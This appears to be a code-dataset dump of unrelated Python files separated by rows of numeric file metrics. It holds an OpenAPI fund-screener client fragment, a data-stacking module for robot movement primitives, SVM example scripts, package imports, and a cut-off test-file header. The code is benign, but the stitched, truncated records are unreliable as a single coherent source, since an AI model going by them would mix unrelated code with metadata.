_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
InlineResponse2005
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get_async(
self,
**kwargs
) -> "ApplyResult[InlineResponse2005]":
"""Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
body (InlineObject2): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[InlineResponse2005]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2005, int, typing.MutableMapping]]":
"""Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
body (InlineObject2): [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(InlineResponse2005, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
| 50.299253
| 1,530
| 0.5899
| 17,757
| 154,972
| 5.002309
| 0.02461
| 0.026749
| 0.030802
| 0.018823
| 0.973375
| 0.969998
| 0.961464
| 0.954473
| 0.95167
| 0.949137
| 0
| 0.011743
| 0.346624
| 154,972
| 3,080
| 1,531
| 50.315584
| 0.865508
| 0.601657
| 0
| 0.757991
| 0
| 0
| 0.172719
| 0.075382
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035008
| false
| 0
| 0.012938
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
39d2f09a3950e4a1e7a26add45a1c3148a8532d8
| 18,115
|
py
|
Python
|
python/dmp_coupling/utilities/DataStacking.py
|
gsutanto/dmp
|
4f4492cf4295d9c3fe0ba9ce2fb726bf37be40df
|
[
"MIT"
] | null | null | null |
python/dmp_coupling/utilities/DataStacking.py
|
gsutanto/dmp
|
4f4492cf4295d9c3fe0ba9ce2fb726bf37be40df
|
[
"MIT"
] | null | null | null |
python/dmp_coupling/utilities/DataStacking.py
|
gsutanto/dmp
|
4f4492cf4295d9c3fe0ba9ce2fb726bf37be40df
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Created on Mon Oct 30 19:00:00 2017
@author: gsutanto
"""
import numpy as np
import os
import sys
import copy
import glob
import scipy.io as sio
def prepareData(task_type,
dataset_Ct,
subset_settings_indices,
considered_subset_outlier_ranked_demo_indices,
generalization_subset_outlier_ranked_demo_indices,
post_filename_stacked_data,
out_data_dir=''):
feature_type = 'raw'
mode_stack_dataset = 1
N_primitive = len(dataset_Ct['sub_Ct_target'])
training_subset_outlier_ranked_demo_indices = list(
set(considered_subset_outlier_ranked_demo_indices) -
set(generalization_subset_outlier_ranked_demo_indices))
if (generalization_subset_outlier_ranked_demo_indices == []):
generalization_subset_outlier_ranked_demo_indices = [
1
] # CANNOT really be empty (for further Python processing)
list_subset_outlier_ranked_demo_indices = [
training_subset_outlier_ranked_demo_indices,
generalization_subset_outlier_ranked_demo_indices
]
list_pre_filename_stacked_data = ['', 'test_unroll_']
X = [[None] * N_primitive for j in range(2)]
Ct_target = [[None] * N_primitive for j in range(2)]
normalized_phase_PSI_mult_phase_V = [[None] * N_primitive for j in range(2)]
data_point_priority = [[None] * N_primitive for j in range(2)]
for ntype in range(len(list_pre_filename_stacked_data)):
for np in range(N_primitive):
[
X[ntype][np], Ct_target[ntype][np],
normalized_phase_PSI_mult_phase_V[ntype][np],
data_point_priority[ntype][np]
] = stackDataset(dataset_Ct, subset_settings_indices, mode_stack_dataset,
list_subset_outlier_ranked_demo_indices[ntype],
feature_type, np)
assert (X[ntype][np].shape[0] == Ct_target[ntype][np].shape[0])
assert (X[ntype][np].shape[0] == normalized_phase_PSI_mult_phase_V[ntype]
[np].shape[0])
assert (X[ntype][np].shape[0] == data_point_priority[ntype][np].shape[0])
if (os.path.isdir(out_data_dir)):
X_dict = {}
Ct_target_dict = {}
normalized_phase_PSI_mult_phase_V_dict = {}
data_point_priority_dict = {}
X_dict['X'] = X[ntype][np]
Ct_target_dict['Ct_target'] = Ct_target[ntype][np]
normalized_phase_PSI_mult_phase_V_dict[
'normalized_phase_PSI_mult_phase_V'] = normalized_phase_PSI_mult_phase_V[
ntype][np]
data_point_priority_dict['data_point_priority'] = data_point_priority[
ntype][np]
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_X_' + feature_type + '_' + task_type +
post_filename_stacked_data + '.mat'), X_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_Ct_target_' + task_type +
post_filename_stacked_data + '.mat'), Ct_target_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_normalized_phase_PSI_mult_phase_V_' +
task_type + post_filename_stacked_data + '.mat'),
normalized_phase_PSI_mult_phase_V_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_data_point_priority_' + task_type +
post_filename_stacked_data + '.mat'), data_point_priority_dict)
if (ntype == 0):
print('Total # of Data Points for Training Primitive ' +
str(np + 1) + ': ' + str(X[ntype][np].shape[0]))
elif (ntype == 1):
print('Total # of Data Points for Generalization Test Primitive ' +
str(np + 1) + ': ' + str(X[ntype][np].shape[0]))
return X, Ct_target, normalized_phase_PSI_mult_phase_V, data_point_priority
def stackDataset(dataset,
subset_settings_indices,
mode,
mode_arg,
feature_type,
primitive_no,
fraction_data_points_included_per_demo_traj=1.0):
assert ((mode == 1) or (mode == 2))
if (mode == 1):
# after ranking the trials based on the outlier metric
# (ranked by dataset["outlier_metric"][primitive_no][setting_no] field,
# i.e. rank 1==most likely is NOT an outlier;
# rank <end>==most likely is an outlier),
# pick a subset of it, specified in subset_outlier_ranked_demo_indices,
# e.g. if subset_outlier_ranked_demo_indices=[1,3,4,5],
# then this function will stack dataset of
# trials rank 1, 3, 4, and 5 (RECOMMENDED).
subset_outlier_ranked_demo_indices = mode_arg
elif (mode == 2):
# pick trials with indices specified in subset_demos_index.
subset_demos_indices = mode_arg
N_settings_to_extract = len(subset_settings_indices)
list_X_setting = [None] * N_settings_to_extract
list_Ct_target_setting = [None] * N_settings_to_extract
list_normalized_phase_PSI_mult_phase_V_setting = [None
] * N_settings_to_extract
list_data_point_priority_setting = [None] * N_settings_to_extract
for ns_idx in range(N_settings_to_extract):
setting_no = subset_settings_indices[ns_idx]
if (mode == 1):
existed_subset_outlier_ranked_demo_indices = list(
set(
range(
len(dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
[primitive_no][setting_no]))).intersection(
set(subset_outlier_ranked_demo_indices)))
subset_demos_indices = [
dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
[primitive_no][setting_no][ssidx]
for ssidx in existed_subset_outlier_ranked_demo_indices
]
if (feature_type == 'raw'):
list_X_setting[ns_idx] = np.hstack([
dataset['sub_X'][primitive_no][setting_no][nd][:, :int(
round(fraction_data_points_included_per_demo_traj *
dataset['sub_X'][primitive_no][setting_no][nd].shape[1]))]
for nd in subset_demos_indices
])
list_Ct_target_setting[ns_idx] = np.hstack([
dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, :int(
round(fraction_data_points_included_per_demo_traj *
dataset['sub_X'][primitive_no][setting_no][nd].shape[1]))]
for nd in subset_demos_indices
])
if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
list_normalized_phase_PSI_mult_phase_V_setting[ns_idx] = np.hstack([
dataset['sub_normalized_phase_PSI_mult_phase_V'][primitive_no]
[setting_no][nd][:, :int(
round(fraction_data_points_included_per_demo_traj *
dataset['sub_X'][primitive_no][setting_no][nd].shape[1]))]
for nd in subset_demos_indices
])
if 'sub_data_point_priority' in dataset:
list_data_point_priority_setting[ns_idx] = np.hstack([
dataset['sub_data_point_priority'][primitive_no][setting_no][nd][:int(
round(fraction_data_points_included_per_demo_traj *
dataset['sub_X'][primitive_no][setting_no][nd].shape[1]))]
for nd in subset_demos_indices
])
X = np.hstack(list_X_setting).T
Ct_target = np.hstack(list_Ct_target_setting).T
if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
normalized_phase_PSI_mult_phase_V = np.hstack(
list_normalized_phase_PSI_mult_phase_V_setting).T
else:
normalized_phase_PSI_mult_phase_V = None
if 'sub_data_point_priority' in dataset:
data_point_priority = np.hstack(list_data_point_priority_setting)
data_point_priority = data_point_priority.reshape(
data_point_priority.shape[0], 1)
else:
data_point_priority = None
return X, Ct_target, normalized_phase_PSI_mult_phase_V, data_point_priority
def prepareRecurCtData(task_type,
dataset_Ct,
subset_settings_indices,
considered_subset_outlier_ranked_demo_indices,
generalization_subset_outlier_ranked_demo_indices,
post_filename_stacked_data,
out_data_dir=''):
feature_type = 'raw'
mode_stack_dataset = 1
N_primitive = len(dataset_Ct['sub_Ct_target'])
training_subset_outlier_ranked_demo_indices = list(
set(considered_subset_outlier_ranked_demo_indices) -
set(generalization_subset_outlier_ranked_demo_indices))
if (generalization_subset_outlier_ranked_demo_indices == []):
generalization_subset_outlier_ranked_demo_indices = [
1
] # CANNOT really be empty (for further Python processing)
list_subset_outlier_ranked_demo_indices = [
training_subset_outlier_ranked_demo_indices,
generalization_subset_outlier_ranked_demo_indices
]
list_pre_filename_stacked_data = ['', 'test_unroll_']
X = [[None] * N_primitive for j in range(2)]
Ct_target = [[None] * N_primitive for j in range(2)]
normalized_phase_PSI_mult_phase_V_times_dt_per_tau = [
[None] * N_primitive for j in range(2)
]
data_point_priority = [[None] * N_primitive for j in range(2)]
Ct_t_minus_1_times_dt_per_tau = [[None] * N_primitive for j in range(2)
] # (Ct[t-1] * (dt/tau))
Ct_t_minus_1 = [[None] * N_primitive for j in range(2)] # (Ct[t-1])
for ntype in range(len(list_pre_filename_stacked_data)):
for np in range(N_primitive):
[
X[ntype][np], Ct_target[ntype][np],
normalized_phase_PSI_mult_phase_V_times_dt_per_tau[ntype][np],
data_point_priority[ntype][np],
Ct_t_minus_1_times_dt_per_tau[ntype][np], Ct_t_minus_1[ntype][np]
] = stackRecurCtDataset(dataset_Ct, subset_settings_indices,
mode_stack_dataset,
list_subset_outlier_ranked_demo_indices[ntype],
feature_type, np)
assert (X[ntype][np].shape[0] == Ct_target[ntype][np].shape[0])
assert (X[ntype][np].shape[0] ==
normalized_phase_PSI_mult_phase_V_times_dt_per_tau[ntype]
[np].shape[0])
assert (X[ntype][np].shape[0] == data_point_priority[ntype][np].shape[0])
assert (X[ntype][np].shape[0] == Ct_t_minus_1_times_dt_per_tau[ntype]
[np].shape[0])
assert (X[ntype][np].shape[0] == Ct_t_minus_1[ntype][np].shape[0])
if (os.path.isdir(out_data_dir)):
X_dict = {}
Ct_target_dict = {}
normalized_phase_PSI_mult_phase_V_times_dt_per_tau_dict = {}
data_point_priority_dict = {}
Ct_t_minus_1_times_dt_per_tau_dict = {}
Ct_t_minus_1_dict = {}
X_dict['X'] = X[ntype][np]
Ct_target_dict['Ct_target'] = Ct_target[ntype][np]
normalized_phase_PSI_mult_phase_V_times_dt_per_tau_dict[
'normalized_phase_PSI_mult_phase_V_times_dt_per_tau'] = normalized_phase_PSI_mult_phase_V_times_dt_per_tau[
ntype][np]
data_point_priority_dict['data_point_priority'] = data_point_priority[
ntype][np]
Ct_t_minus_1_times_dt_per_tau_dict[
'Ct_t_minus_1_times_dt_per_tau'] = Ct_t_minus_1_times_dt_per_tau[
ntype][np]
Ct_t_minus_1_dict['Ct_t_minus_1'] = Ct_t_minus_1[ntype][np]
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_X_' + feature_type + '_' + task_type +
post_filename_stacked_data + '.mat'), X_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_Ct_target_' + task_type +
post_filename_stacked_data + '.mat'), Ct_target_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) +
'_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_' +
task_type + post_filename_stacked_data + '.mat'),
normalized_phase_PSI_mult_phase_V_times_dt_per_tau_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_data_point_priority_' + task_type +
post_filename_stacked_data + '.mat'), data_point_priority_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_Ct_t_minus_1_times_dt_per_tau_' +
task_type + post_filename_stacked_data + '.mat'),
Ct_t_minus_1_times_dt_per_tau_dict)
sio.savemat(
(out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
'prim_' + str(np + 1) + '_Ct_t_minus_1_' + task_type +
post_filename_stacked_data + '.mat'), Ct_t_minus_1_dict)
if (ntype == 0):
print('Total # of Data Points for Training Primitive ' +
str(np + 1) + ': ' + str(X[ntype][np].shape[0]))
elif (ntype == 1):
print('Total # of Data Points for Generalization Test Primitive ' +
str(np + 1) + ': ' + str(X[ntype][np].shape[0]))
return X, Ct_target, normalized_phase_PSI_mult_phase_V_times_dt_per_tau, data_point_priority, Ct_t_minus_1_times_dt_per_tau, Ct_t_minus_1
def stackRecurCtDataset(dataset, subset_settings_indices, mode, mode_arg,
feature_type, primitive_no):
assert ((mode == 1) or (mode == 2))
if (mode == 1):
# after ranking the trials based on the outlier metric
# (ranked by dataset["outlier_metric"][primitive_no][setting_no] field,
# i.e. rank 1==most likely is NOT an outlier;
# rank <end>==most likely is an outlier),
# pick a subset of it, specified in subset_outlier_ranked_demo_indices,
# e.g. if subset_outlier_ranked_demo_indices=[1,3,4,5],
# then this function will stack dataset of
# trials rank 1, 3, 4, and 5 (RECOMMENDED).
subset_outlier_ranked_demo_indices = mode_arg
elif (mode == 2):
# pick trials with indices specified in subset_demos_index.
subset_demos_indices = mode_arg
N_settings_to_extract = len(subset_settings_indices)
list_X_setting = [None] * N_settings_to_extract
list_Ct_target_setting = [None] * N_settings_to_extract
list_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_setting = [
None
] * N_settings_to_extract
list_data_point_priority_setting = [None] * N_settings_to_extract
list_Ct_t_minus_1_times_dt_per_tau = [None] * N_settings_to_extract
list_Ct_t_minus_1 = [None] * N_settings_to_extract
for ns_idx in range(N_settings_to_extract):
setting_no = subset_settings_indices[ns_idx]
if (mode == 1):
existed_subset_outlier_ranked_demo_indices = list(
set(
range(
len(dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
[primitive_no][setting_no]))).intersection(
set(subset_outlier_ranked_demo_indices)))
subset_demos_indices = [
dataset['trial_idx_ranked_by_outlier_metric_w_exclusion']
[primitive_no][setting_no][ssidx]
for ssidx in existed_subset_outlier_ranked_demo_indices
]
if (feature_type == 'raw'):
list_X_setting[ns_idx] = np.hstack([
dataset['sub_X'][primitive_no][setting_no][nd][:, 1:]
for nd in subset_demos_indices
])
list_Ct_target_setting[ns_idx] = np.hstack([
(dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, 1:])
for nd in subset_demos_indices
])
# dt/tau = 1/(traj_length-1) = (1.0/(dataset["sub_Ct_target"][primitive_no][setting_no][nd].shape[1]-1)) = (1.0/(dataset["sub_normalized_phase_PSI_mult_phase_V"][primitive_no][setting_no][nd].shape[1]-1))
list_Ct_t_minus_1_times_dt_per_tau[ns_idx] = np.hstack([
((1.0 /
(dataset['sub_Ct_target'][primitive_no][setting_no][nd].shape[1] - 1))
* dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, :-1])
for nd in subset_demos_indices
])
list_Ct_t_minus_1[ns_idx] = np.hstack([
(dataset['sub_Ct_target'][primitive_no][setting_no][nd][:, :-1])
for nd in subset_demos_indices
])
if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
list_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_setting[
ns_idx] = np.hstack([
((1.0 / (dataset['sub_normalized_phase_PSI_mult_phase_V']
[primitive_no][setting_no][nd].shape[1] - 1)) *
dataset['sub_normalized_phase_PSI_mult_phase_V'][primitive_no]
[setting_no][nd][:, 1:]) for nd in subset_demos_indices
])
if 'sub_data_point_priority' in dataset:
list_data_point_priority_setting[ns_idx] = np.hstack([
dataset['sub_data_point_priority'][primitive_no][setting_no][nd][1:]
for nd in subset_demos_indices
])
X = np.hstack(list_X_setting).T
Ct_target = np.hstack(list_Ct_target_setting).T
Ct_t_minus_1_times_dt_per_tau = np.hstack(
list_Ct_t_minus_1_times_dt_per_tau).T
Ct_t_minus_1 = np.hstack(list_Ct_t_minus_1).T
if 'sub_normalized_phase_PSI_mult_phase_V' in dataset:
normalized_phase_PSI_mult_phase_V_times_dt_per_tau = np.hstack(
list_normalized_phase_PSI_mult_phase_V_times_dt_per_tau_setting).T
else:
normalized_phase_PSI_mult_phase_V_times_dt_per_tau = None
if 'sub_data_point_priority' in dataset:
data_point_priority = np.hstack(list_data_point_priority_setting)
data_point_priority = data_point_priority.reshape(
data_point_priority.shape[0], 1)
else:
data_point_priority = None
return X, Ct_target, normalized_phase_PSI_mult_phase_V_times_dt_per_tau, data_point_priority, Ct_t_minus_1_times_dt_per_tau, Ct_t_minus_1
| 44.39951
| 208
| 0.664367
| 2,518
| 18,115
| 4.284353
| 0.067514
| 0.036707
| 0.069336
| 0.081572
| 0.976455
| 0.970152
| 0.967835
| 0.956526
| 0.951428
| 0.937616
| 0
| 0.011539
| 0.234557
| 18,115
| 407
| 209
| 44.5086
| 0.766479
| 0.076511
| 0
| 0.705357
| 0
| 0
| 0.087436
| 0.051084
| 0
| 0
| 0
| 0
| 0.029762
| 1
| 0.011905
| false
| 0
| 0.017857
| 0
| 0.041667
| 0.011905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39dbab390b1b73203c43afb52f411617d9a50949
| 3,855
|
py
|
Python
|
examples/svm_example.py
|
Yangruipis/simple_ml
|
09657f6b017b973a5201aa611774d6ac8f0fc0a2
|
[
"MIT"
] | 25
|
2018-04-17T04:38:51.000Z
|
2021-10-09T04:07:53.000Z
|
examples/svm_example.py
|
Yangruipis/simple_ml
|
09657f6b017b973a5201aa611774d6ac8f0fc0a2
|
[
"MIT"
] | null | null | null |
examples/svm_example.py
|
Yangruipis/simple_ml
|
09657f6b017b973a5201aa611774d6ac8f0fc0a2
|
[
"MIT"
] | 5
|
2018-04-17T05:27:00.000Z
|
2020-12-01T02:55:15.000Z
|
# -*- coding:utf-8 -*-
from simple_ml.svm import *
from simple_ml.classify_data import *
from simple_ml.data_handle import train_test_split
def iris_example():
"""
线性可分情况
:return:
"""
x, y = get_iris()
x = x[(y == 0) | (y == 1)]
y = y[(y == 0) | (y == 1)]
x_train, y_train, x_test, y_test = train_test_split(x, y, 0.3, 918)
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.linear)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test)
def iris_example2():
"""
线性不可分,软间隔情况
:return:
"""
x, y = get_iris()
x = x[(y == 1) | (y == 2)]
y = y[(y == 1) | (y == 2)]
x_train, y_train, x_test, y_test = train_test_split(x, y, 0.3, 918)
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.linear)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test)
def moon_example():
"""
线性不可分,高维可分情况
:return:
"""
x, y = get_wine() # get moon()
x = x[(y == 0) | (y == 1)]
y = y[(y == 0) | (y == 1)]
x_train, y_train, x_test, y_test = train_test_split(x, y, 0.3, 918)
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.linear)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Linear")
# sigma设置的比较小,会过拟合
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.gaussian, sigma=0.5)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Gaussian(sigma=0.5)")
# sigma设置的比较大,会欠拟合
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.gaussian, sigma=1)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Gaussian(sigma=1.0)")
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.laplace, sigma=1)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Laplace(sigma=1)")
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.sigmoid, beta=1, theta=-1)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Sigmoid(beta=1,theta=1)")
def multi_class_example():
x, y = get_wine() # get moon()
x_train, y_train, x_test, y_test = train_test_split(x, y, 0.3, 918)
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.linear)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Linear")
# sigma设置的比较小,会过拟合
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.gaussian, sigma=0.5)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Gaussian(sigma=0.5)")
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.gaussian, sigma=1)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Gaussian(sigma=1)")
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.laplace, sigma=1)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Laplace(sigma=1)")
mysvm = SVM(0.6, 0.001, 0.00001, 50, KernelType.sigmoid, beta=1, theta=-1)
mysvm.fit(x_train, y_train)
print(mysvm.alphas, mysvm.b)
print(mysvm.predict(x_train))
mysvm.classify_plot(x_test, y_test, ", Sigmoid(beta=1,theta=1)")
if __name__ == '__main__':
# iris_example()
# moon_example()
multi_class_example()
| 30.354331
| 78
| 0.636057
| 643
| 3,855
| 3.620529
| 0.096423
| 0.072165
| 0.04811
| 0.082474
| 0.885309
| 0.885309
| 0.885309
| 0.871564
| 0.857388
| 0.857388
| 0
| 0.073226
| 0.19585
| 3,855
| 126
| 79
| 30.595238
| 0.677742
| 0.047471
| 0
| 0.843373
| 0
| 0
| 0.05323
| 0.012753
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048193
| false
| 0
| 0.036145
| 0
| 0.084337
| 0.289157
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f2e661a3048e4e47fa60f7aea909b584b62ba57a
| 128
|
py
|
Python
|
website/handlers/docs/__init__.py
|
glennyonemitsu/funkybomb
|
ee1444e2783b347951aa67265615e18514cac8c5
|
[
"Apache-2.0"
] | 1
|
2018-12-19T18:43:52.000Z
|
2018-12-19T18:43:52.000Z
|
website/handlers/docs/__init__.py
|
glennyonemitsu/funkybomb
|
ee1444e2783b347951aa67265615e18514cac8c5
|
[
"Apache-2.0"
] | null | null | null |
website/handlers/docs/__init__.py
|
glennyonemitsu/funkybomb
|
ee1444e2783b347951aa67265615e18514cac8c5
|
[
"Apache-2.0"
] | null | null | null |
from handlers.docs import basics # noqa
from handlers.docs import patterns # noqa
from handlers.docs import integrations # noqa
| 32
| 45
| 0.8125
| 18
| 128
| 5.777778
| 0.444444
| 0.346154
| 0.461538
| 0.634615
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 128
| 3
| 46
| 42.666667
| 0.945455
| 0.109375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ffc01954f53e41987dc87a2b5a21a463ac9e0673
| 59,802
|
py
|
Python
|
src/codplayer/test/test_player.py
|
petli/codplayer
|
172187b91662affd8e89f572c0db9be1c4257627
|
[
"MIT"
] | 14
|
2015-04-27T20:40:46.000Z
|
2019-02-01T09:22:02.000Z
|
src/codplayer/test/test_player.py
|
petli/codplayer
|
172187b91662affd8e89f572c0db9be1c4257627
|
[
"MIT"
] | 10
|
2015-01-05T18:11:28.000Z
|
2018-09-03T08:42:50.000Z
|
src/codplayer/test/test_player.py
|
petli/codplayer
|
